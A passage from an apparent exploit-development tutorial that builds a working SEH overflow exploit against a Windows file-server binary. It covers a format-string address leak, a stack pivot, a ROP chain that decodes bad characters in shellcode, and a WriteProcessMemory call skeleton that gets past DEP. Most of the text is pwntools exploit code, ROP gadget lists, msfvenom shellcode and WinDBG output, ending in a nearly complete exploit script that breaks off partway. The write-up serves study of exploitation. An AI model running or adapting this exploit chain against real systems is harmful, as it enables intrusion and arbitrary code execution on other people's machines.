The next task is to find the offset at which we overwrite SEH. To do so we generate a pattern (msf-pattern_create -l 4000), send it and use it to get the offset (msf-pattern_offset -q ... -l 4000) at which we have to put the value that overwrites our SEH entry. We don’t know much about the required length yet but trying a few values and observing if any of them crashes the application and if a pattern value appears on !exchain is a viable approach. Eventually this will lead to the offset 1032.

With these new insights we can update the poc to crash the target and place Bs inside NSEH & Cs inside SEH.

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += b"A" * (offset)
buf += b"B" * 4 # nseh
buf += b"C" * 4 # seh
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close()

0:001> !exchain
0170f6a0: 43434343 (SEH)
Invalid exception stack at 42424242 (NSEH)

Warming Up

Now we have to find a single gadget that somehow gets us back to our input buffer.

0:001> r esp
esp=0170eab0
0:001> s -a 0 L?80000000 "AAAAAAAAAAAAAAA"
0133e66c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
015205c0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
0170f298  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

The start of our As appears three times in memory. The last hit looks the most promising because it’s fairly close to our stack pointer:

0:001> ? 0170f298 - 0170eab0
Evaluate expression: 2024 = 000007e8

To find a gadget that can jump that far (or a bit further, it does not have to be exact) we can use ropper:

ropper --file rainbow2.exe --console
search add esp, %
...
0x4011139d: add esp, 0xd60; ret;
0x40111396: add esp, 0xe10; ret;
...

These look promising. We replace the Cs (the SEH entry) with the gadget that adds 0xe10 to esp, taking the leaked binary base into account, and then run the exploit again.

...
buf += b"B" * 4 # nseh
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
...

We set a breakpoint on the gadget and see if we can hit our buffer:

0:003> !exchain
0164fbd4: filesrv+11396 (3fac1396)
Invalid exception stack at 42424242
0:003> ba e1 3fac1396
0:003> g
Breakpoint 0 hit
filesrv+0x11396:
3fac1396 81c4100e0000    add     esp,0E10h
0:003> p
3fac139c c3              ret
0:003> dd esp
0164f844  41414141 41414141 41414141 41414141

We indeed managed to land inside our buffer, more precisely at the part before our SEH gadget. By going back a bit we can see that we are about 0x78 bytes into our buffer.

0:003> dd esp-80 L40
0164f7c4  00000000 0000000f 41414141 41414141
0164f7d4  41414141 41414141 41414141 41414141
...

This is pretty good since we placed 1036 As and most of them are still ahead of us, leaving us with some room to work with. Since DEP is enabled, we can not simply execute shellcode here and have to think about how we can utilize ROP to make progress.

Playing with ROP

Ultimately we want to call a function that allows us to get around DEP and execute shellcode. Good candidates are VirtualProtect, VirtualAlloc or WriteProcessMemory. Since we are on x86, the arguments for function calls are placed on the stack. I’m aware of 2 different approaches to set up function arguments in this situation. We could carefully prepare the registers and then execute pushad so the values are put onto the stack. All of this has to be done in ROP though, and every time you set up a register you can not use it anymore later on, which makes this a bit tricky.

Another approach is to prepare a call “skeleton”, an area on the stack that holds dummy values for the function arguments. We then get a reference to the skeleton and replace the dummy values with the ones we need. In the end we pivot the stack to the skeleton and thereby execute the function we want.

As mentioned in the beginning, for this post we want to call WriteProcessMemory. This will allow us to write our shellcode to a codecave that is already executable but not writeable. WriteProcessMemory internally calls VirtualProtect to temporarily make the area writeable, writes the data & then restores memory permissions. WriteProcessMemory has the following Signature:

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

Which in our skeleton looks like this:

0xffffffff, # hProcess (-1 == current process)
codecave,   # lpBaseAddress (dst)
0x42424242, # lpBuffer (src) 
0x43434343, # nSize
writeable,  # lpNumberOfBytesWritten

This approach has one caveat: if we have to avoid bad bytes in our shellcode and we copy it to a non-writable area, we can not use any shellcode that needs to modify itself (e.g. all msf encoders). To get around that, we have to encode the shellcode before we send it and then use ROP to decode it while it is still on the stack (before we copy it & jump to the codecave copy).

To discover bad bytes we send all bytes from 0x00 to 0xFF and remove, one by one, those that stop the binary from crashing or that get mangled in memory. This results in the following bad chars:

\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C
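
A test buffer for this elimination process is easy to generate. The sketch below (the helper name is an assumption) builds all 256 byte values minus the ones already identified, so the buffer can be resent after each newly discovered bad byte.

```python
# Final bad-byte list from above.
BAD = bytes.fromhex("000102030405060708090a0b0c0d202f5c")

def probe_bytes(known_bad: bytes = b"") -> bytes:
    """All byte values 0x00-0xff except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in known_bad)

print(len(probe_bytes()))      # 256
print(len(probe_bytes(BAD)))   # 239
```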

Since it will be pretty difficult to craft shellcode that does not contain any of these we will go with the ROP shellcode decoder as just mentioned. Before we dive into that, let’s look at the structure the exploit is going to have. Since we are dealing with some space restrictions we have to be careful about the layout.

LST | Skeleton + RopNops + Decoder + RopNops | NSEH (dummy) + SEH (stack pivot) | RopNops + RopWriteProcessMemorySetup + Shellcode + Padding |
    | ----------------1036-------------------|----------------8-----------------|------------------------ ~2200 -----------------------------|

Note that even though we send 4000 bytes, not all of them will end up on the stack. We run into a page boundary, which cuts the usable size down to roughly 3200-3300 bytes.

Shellcode Encoding & Decoding

The first problem we are going to tackle is the Shellcode encoding & decoding. Our shellcode for this post will be the following one:

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -e none
sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

As you can see, we did not use any encoder since we will be doing that ourselves. Before we send anything, we do our custom encoding, and since there are not that many bad chars I decided to subtract 0x55 from every bad character. The bad characters are all rather small, so subtracting a value like 0x55 brings them to byte values that should be safe. If you have more bad characters, you could also use an individual offset for every character or substitution tables.

We iterate over the shellcode and identify the indices of all bad characters. Then we subtract the offset (here 0x55) from all bad chars, modulo 256, so they become "safe", e.g. 0x20 - 0x55 = 0xcb.

def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacements: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)
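
Before building the decoder, it is worth checking that the chosen offset really produces safe bytes. The sketch below is an independent re-implementation for illustration (the names `encode` and `unsafe_replacements` are hypothetical, and the sample bytes are a short excerpt, not the full shellcode). With an offset of 0x55, the bad byte 0x5C would map to 0x07, which is itself a bad character. The calc shellcode above contains no 0x5C, so the problem does not show up here, but other payloads may need a different offset.

```python
BADCHARS = bytes(range(0x00, 0x0E)) + b"\x20\x2f\x5c"
OFFSET = 0x55


def encode(sc: bytes) -> bytes:
    """Subtract OFFSET (mod 256) from every bad byte, leave the rest alone."""
    return bytes((b - OFFSET) & 0xFF if b in BADCHARS else b for b in sc)


def unsafe_replacements() -> dict:
    """Map each bad byte whose replacement is itself a bad byte."""
    return {
        b: (b - OFFSET) & 0xFF
        for b in BADCHARS
        if (b - OFFSET) & 0xFF in BADCHARS
    }


# Short excerpt for illustration: start of the shellcode plus a 0x20 byte.
sample = b"\xfc\xe8\x82\x00\x00\x00\x60\x20"
encoded = encode(sample)

print(encoded.hex())
print({hex(k): hex(v) for k, v in unsafe_replacements().items()})
```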

With our shellcode encoded, we now have to start building the ROP decoder that will undo our changes to the shellcode:

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)   # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
	rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

First we get a copy of esp into ecx. Then we load eax with 0x522, add 2, and add ecx to it. The point is to get from the stack pointer to our shellcode, since the ROP decoder needs to start decoding exactly at the start of our shellcode. After this first part is done, eax holds the start address of our shellcode as required.

We then loop over all indices of bad chars in our shellcode, advancing eax so it always points to the next bad char. We then increment the byte value at that location by 0x55, reversing the encoding operation. Note that this adds 7*4=28 bytes for every bad char and we don't have much more than 1000 bytes for this ROP decoder, which means that we are limited in the number of bad chars we can handle (about 30).
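
The loop can be modelled in plain Python to check both the pointer arithmetic and the space budget. This is a simulation sketch and not exploit code: `simulate_decoder` and `decoder_loop_bytes` are hypothetical names, and eax is modelled as an index relative to the shellcode start. It also shows why the value popped into ecx is 0x11111155: only the low byte (cl) is added, while the upper bytes keep null bytes out of the chain.

```python
OFFSET_VALUE = 0x11111155      # dword popped into ecx; only cl (0x55) is used
DWORDS_PER_BAD_CHAR = 7        # entries added per loop iteration
DWORD = 4


def simulate_decoder(encoded: bytes, bad_indices: list) -> bytes:
    """Replay the decoder loop on a copy of the encoded shellcode."""
    buf = bytearray(encoded)
    eax = 0                    # index relative to the shellcode start
    prev = 0
    for idx in bad_indices:
        delta = idx - prev
        ecx = (-delta) & 0xFFFFFFFF            # pop ecx (negated distance)
        eax = (eax - ecx) & 0xFFFFFFFF         # sub eax, ecx  => eax += delta
        cl = OFFSET_VALUE & 0xFF               # pop ecx (decode value)
        buf[eax] = (buf[eax] + cl) & 0xFF      # add byte ptr [eax], cl
        prev = idx
    return bytes(buf)


def decoder_loop_bytes(bad_count: int) -> int:
    """Stack space used by the loop part of the decoder."""
    return bad_count * DWORDS_PER_BAD_CHAR * DWORD


original = b"\x90\x00\x41\x20\x0a"
bad_indices = [1, 3, 4]
encoded = b"\x90\xab\x41\xcb\xb5"              # bad bytes minus 0x55, mod 256

print(simulate_decoder(encoded, bad_indices) == original)
print(decoder_loop_bytes(30))
```

Thirty bad characters already need 840 bytes for the loop alone, which is why the budget of roughly 1000 bytes caps the count at about that number.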

Before moving on, let's observe once how the decoder modifies a bad char:

filesrv+0x7f17a:
3fb2f17a 0008            add     byte ptr [eax],cl          ds:002b:00c1fd60=cb
0:001> r eax
eax=00c1fd60 <- Write Target
0:001> r ecx
ecx=11111155 <- Low Byte is Write Value

0:001> dd eax
00c1fd60  64db31cb <- 0x20 - 0x55 = 0xcb
0:001> p
0:001> dd eax
00c1fd60  64db3120 <- 0xcb + 0x55 = 0x20

This shows that we can successfully decode our shellcode bad chars.

Working with Skeletons

Now it's time to replace the dummy values for the call to WriteProcessMemory that we placed at the very top of our buffer on the stack. We don't have much room after our ROP decoder and before our stack pivot gadget, so we fill up with ropnops (just ret instructions) and jump over the gadget as follows:

rop1 = b""
# add skeleton
for g in skeleton:
      rop1 += p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop1)-4, 4):
      rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += b"D" * (size-len(buf))
p.sendline(buf)

0:003> dd esp L100
...
0112f710  3fab159d 3fab159d 3fab159d 3fab159d
0112f720  3faeda53 3fac1396 3fac1396 44444444 <- Jump over SEH entry
0112f730  44444444 44444444 44444444 44444444
0:003> ba e1 filesrv+0x3da53
0:003> g
filesrv+0x3da53:
3faeda53 83c410          add     esp,10h
0:003> dd esp
018ff820  3fac1396 3fac1396 44444444 44444444

This leaves us in the "big" area of our payload, where we can place the ROP chain that modifies the skeleton and also our shellcode. Our first task is to align a register (here ecx) with our skeleton.

0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
writeable,
0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
0x704F4 + binary_base,  # pop eax; ret;
0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7609f + binary_base,  # add eax, 4; ret;
0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
0x41414141,
0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
0x41414141,

WinDBG shows that ecx is now indeed aligned with our skeleton:

0:001> dd ecx
009df688  41414141 3fab1010 ffffffff 3fab1010
009df698  42424242 43434343 3fb5635a 3fab159d

Once we have a pointer to the skeleton, we can proceed to replace the dummy values. The first one (where we placed As) is the address of WriteProcessMemory. We do not have a kernel32 leak, so we have to find another way to get its address. If we look at the binary's Import Address Table (IAT), we can see that it imports quite a few functions, but none of them is WriteProcessMemory.

This is unfortunate, but we can use another function from kernel32 and calculate the offset to WriteProcessMemory from that address. The only downside is that we lose some portability, as we have to know the target's Windows version and patch level or need a copy of its kernel32.dll. We can use WinDBG to get the offset:

0:003> ? kernel32!writeprocessmemorystub - kernel32!writefile
Evaluate expression: 72848 = 00011c90

Now we can extend our ropchain to dereference the IAT entry of WriteFile, add the offset & then write this value to our skeleton:

0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax]
0x636a2 + binary_base,  # pop edx; ret;
0xfffee370,             # -00011c90, offset from WriteFile to WriteProcessMemory
0x59a05 + binary_base,  # sub eax, edx; pop ebp; ret;
0x41414141,
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
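
The chain subtracts the negated offset instead of adding 0x00011c90 directly because the positive value contains the bad bytes 0x00 and 0x01 when packed as a little-endian dword. The arithmetic can be checked as follows. This is a sketch with hypothetical helper names; the WriteFile address is derived here from the WriteProcessMemoryStub address in the trace (76c45240) minus the offset, not read from the target.

```python
import struct

BADCHARS = bytes(range(0x00, 0x0E)) + b"\x20\x2f\x5c"


def neg32(value: int) -> int:
    """Two's complement negation in 32 bits."""
    return (-value) & 0xFFFFFFFF


def sub32(a: int, b: int) -> int:
    """Model of `sub eax, edx` on 32-bit registers."""
    return (a - b) & 0xFFFFFFFF


def has_bad_bytes(dword: int) -> bool:
    """True if the little-endian encoding contains a bad character."""
    return any(b in BADCHARS for b in struct.pack("<I", dword))


delta = 0x00011C90                 # WriteProcessMemoryStub - WriteFile
edx = neg32(delta)                 # value placed in the chain
write_file = 0x76C45240 - delta    # derived for this illustration only
wpm = sub32(write_file, edx)       # eax after `sub eax, edx`

print(hex(edx), hex(wpm))
print(has_bad_bytes(delta), has_bad_bytes(edx))
```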

We can confirm in WinDBG that the value has been written:

filesrv+0x7ab35:
3fb2ab35 8901            mov     dword ptr [ecx],eax  ds:002b:019bf370=41414141
0:003> dd ecx
019bf370  41414141 3fab1010 ffffffff 3fab1010
0:003> p
3fb2ab37 5d              pop     ebp
0:003> dd ecx
019bf370  76c45240 3fab1010 ffffffff 3fab1010

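Now we move the skeleton pointer ahead by 16 bytes to point to the next value we want to replace. The first of the 17 entries is consumed as filler by the pop ebp of the preceding gadget, so only 16 increments execute: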

0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 4
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 8
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 12
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 16
0x0582b + binary_base, # inc ecx; ret 0;

The next value we want to write is the shellcode address on the stack, which is the source of the copy operation that WriteProcessMemory will perform. To get a pointer to our shellcode, we have to look in the debugger at how far the start of the shellcode is from our current position on the stack. In this case, the following gadgets move eax exactly to the start of the shellcode and write it to where ecx points (which is still the next skeleton value to overwrite):

0x16238 + binary_base, # mov eax, ecx; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
0x41414141,
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x7ab35 + binary_base, # mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf380  019bf915 43434343 3fb5635a 3fab159d
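
The value in the dump matches the gadget arithmetic from the listing above: eleven times add 0x7f, one sub 0x30 and ten times add 8, starting from ecx. A quick check, using a hypothetical helper `apply_adjustments` and the ecx value from this debugging session:

```python
def apply_adjustments(start: int, steps: list) -> int:
    """Apply (count, amount) register adjustments with 32-bit wraparound."""
    value = start
    for count, amount in steps:
        value = (value + count * amount) & 0xFFFFFFFF
    return value


ecx = 0x019BF380                       # skeleton slot for lpBuffer
steps = [
    (11, 0x7F),                        # add eax, 0x7f  (x11)
    (1, -0x30),                        # sub eax, 0x30
    (10, 8),                           # add eax, 8     (x10)
]
shellcode_ptr = apply_adjustments(ecx, steps)

print(hex(shellcode_ptr - ecx), hex(shellcode_ptr))
```

The distance depends on the length of the second ROP chain, so it has to be measured again whenever that chain changes.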

The next value we have to replace is the size. We have to choose a value that is large enough for our shellcode but not so big that it causes issues. The following ROP gadgets move the skeleton pointer ahead once again and place the value 0x401 as the size, which is enough to hold our shellcode.

# Write size (0x401) to skeleton dummy value
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x704F4 + binary_base,  # pop eax
0x19b3  + binary_base,  # addr of 0x401;
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf384  00001040  3fb5635a 3fab159d 3fab159d

At this point, the only thing left to do is to align ecx with the start of our skeleton again (we increased it for every dummy value replacement) and then pivot the stack exactly to the skeleton:

0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x8b299 + binary_base,  # mov esp, ecx; ret;

When we break on this last stack pivot gadget, we can see that we indeed return into WriteProcessMemory! Note that directly after this address we placed the address of the codecave, which means that we return into the shellcode after WriteProcessMemory is done. We confirm in WinDBG that we can step through the nops in our shellcode after returning from the function:

filesrv+0x8b29b:
3fb3b29b c3              ret
0:003> p
KERNEL32!WriteProcessMemoryStub:
76c45240 8bff            mov     edi,edi
0:003> pt
KERNELBASE!WriteProcessMemory+0x7e:
76b19dfe c21400          ret     14h
0:003> p
filesrv+0x1010:
3fab1010 90              nop
filesrv+0x1011:
3fab1011 90              nop
...
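
The trace follows from the stdcall frame that the skeleton imitates: the function address, then the return address, then the five arguments, which the callee removes itself with `ret 14h` (5 * 4 = 0x14 bytes). The following sketch packs such a frame with the values seen in this session. `build_call_frame` is a hypothetical helper, the addresses are specific to this debugging run, and nSize uses the 0x401 named in the text.

```python
import struct


def build_call_frame(func: int, ret_addr: int, args: tuple) -> bytes:
    """Pack [function, return address, arg0..argN] as little-endian dwords."""
    return struct.pack(f"<{2 + len(args)}I", func, ret_addr, *args)


frame = build_call_frame(
    0x76C45240,          # KERNEL32!WriteProcessMemoryStub (from the trace)
    0x3FAB1010,          # return address: codecave
    (
        0xFFFFFFFF,      # hProcess: pseudo handle for the current process
        0x3FAB1010,      # lpBaseAddress: codecave (destination)
        0x019BF915,      # lpBuffer: shellcode on the stack (source)
        0x401,           # nSize
        0x3FB5635A,      # lpNumberOfBytesWritten: writable dword
    ),
)
args_bytes = len(frame) - 8          # bytes the callee cleans up on return

print(len(frame), hex(args_bytes))
```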

This indeed worked. If we now let execution continue, we get our calc.

To get a reverse shell we can replace the shellcode, but it must still contain no more than about 30 bad characters. This can be a bit tricky when using msfvenom, but it is not difficult to achieve with custom shellcode that is already null-byte free (so the ROP decoder does not have to fix those bytes).

Finally here is the complete exploit:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120
log.info("Binary base: "+hex(binary_base))

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)  # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
	rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

# since this is writeprocessmemory, we will have to encode the shellcode & decode it via rop
def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
